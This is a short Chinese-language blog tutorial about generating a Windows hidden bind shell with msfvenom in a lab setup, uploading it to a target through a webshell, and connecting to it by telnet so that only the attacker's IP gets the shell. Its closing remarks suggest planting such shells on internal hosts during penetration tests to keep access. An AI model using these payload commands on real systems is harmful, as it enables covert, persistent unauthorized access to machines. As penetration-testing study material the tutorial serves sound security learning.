#Msfvenom
场景
有时候我们上传Shell到目标主机后,不仅我们自己可以连接,其他用户也可以连接,有时候会导致我们丢失该Shell,甚至该shell被用户发现并查杀,本篇文章我们将介绍如何通过Msfvenom来生成用户自己的专属Shell
实验环境
【kali(攻击主机)】:192.168.10.131
【win7(目标主机)】:192.168.10.134
【win10(其他主机)】:192.168.10.1
操作流程
Step 1:实验MSF生成隐藏Bind Shell
msfvenom -p windows/shell_hidden_bind_tcp LPORT=8889 AHOST=192.168.10.131 -f exe > hidden_shell.exe
Step 2:之后将hidden_shell.exe通过一句话木马或者其他方式上传/下载到目标主机上并执行
Step 3:之后查看目标主机本地的8889端口是否开放
❗注意,确保实验顺利进行,记得先关闭杀软,下载之后要点击运行。
Step 4:之后使用同网段的其他主机链接该目标主机
telnet 192.168.10.134 8889
Step 5:使用攻击主机去链接
telnet 192.168.10.134 8889
文末思考
通过制作类似的专属Shell还有一个好处就是当你在内网渗透测试过程中拿下一台跳板机时,你可以利用这台跳板机生成一个正向木马并将其丢到内网的其他机器里面,之后随时可以通过Telnet获取到目标的shell。
标签:攻防,Shell,主机,192.168,Step,shell,Msfvenom From: https://www.cnblogs.com/o-O-oO/p/18303592